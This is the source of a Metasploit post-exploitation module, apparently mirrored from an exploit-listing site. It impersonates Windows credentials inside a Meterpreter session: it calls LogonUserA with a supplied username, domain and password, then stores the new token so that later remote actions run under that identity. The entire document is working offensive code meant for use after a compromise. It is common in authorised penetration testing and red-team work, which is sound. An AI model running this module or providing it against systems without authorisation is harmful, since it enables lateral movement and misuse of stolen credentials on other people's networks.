## https://sploitus.com/exploit?id=MSF:POST-WINDOWS-MANAGE-MAKE_TOKEN-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Make Token Command',
'Description' => %q{
In its default configuration, this module creates a new network security context with the specified
logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and
a new logon session is created and linked to that token. The token is then impersonated to acquire
the new network security context. This module has no effect on local actions - only on remote ones
(where the specified credential material will be used). This module does not validate the credentials
specified.
},
'License' => MSF_LICENSE,
'Notes' => {
'AKA' => ['make_token', 'maketoken'],
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
},
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => [
'Daniel López Jiménez (attl4s)',
'Simone Salucci (saim1z)'
],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_railgun_api
stdapi_sys_config_revert_to_self
stdapi_sys_config_update_token
]
}
}
)
)
register_options(
[
OptString.new('DOMAIN', [true, 'Domain to use' ]),
OptString.new('USERNAME', [true, 'Username to use' ]),
OptString.new('PASSWORD', [true, 'Password to use' ])
]
)
register_advanced_options(
[
OptEnum.new('LOGONTYPE', [true, 'The type of logon operation to perform. Using LOGON32_LOGON_INTERACTIVE may cause issues within the session (typically due to the token filtering done by the UserAccountControl mechanism in Windows). Use with caution', 'LOGON32_LOGON_NEW_CREDENTIALS', ['LOGON32_LOGON_BATCH', 'LOGON32_LOGON_INTERACTIVE', 'LOGON32_LOGON_NETWORK', 'LOGON32_LOGON_NETWORK_CLEARTEXT', 'LOGON32_LOGON_NEW_CREDENTIALS', 'LOGON32_LOGON_SERVICE', 'LOGON32_LOGON_UNLOCK']]),
]
)
end
def run
# Make sure we meet the requirements before running the script
fail_with(Failure::BadConfig, 'This module requires a Meterpreter session') unless session.type == 'meterpreter'
# check/set vars
user = datastore['USERNAME']
password = datastore['PASSWORD']
domain = datastore['DOMAIN']
logontype = datastore['LOGONTYPE']
# revert any existing impersonation before doing a new one
print_status('Executing rev2self to revert any previous token impersonations')
session.sys.config.revert_to_self
# create new logon session / token pair
print_status("Executing LogonUserA with the flag #{logontype} to create a new security context for #{domain}\\#{user}")
logon_user = session.railgun.advapi32.LogonUserA(user, domain, password, logontype, 'LOGON32_PROVIDER_DEFAULT', 4)
if logon_user['return']
# get the token handle
ph_token = logon_user['phToken']
print_status('Impersonating the new security context...')
# store the token within the server
session.sys.config.update_token(ph_token)
print_good('The session should now run with the new security context!')
# send warning
if logontype == 'LOGON32_LOGON_NEW_CREDENTIALS'
print_warning('Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)')
end
else
print_error("LogonUserA call failed, Error Code: #{logon_user['GetLastError']} - #{logon_user['ErrorMessage']}")
end
end
end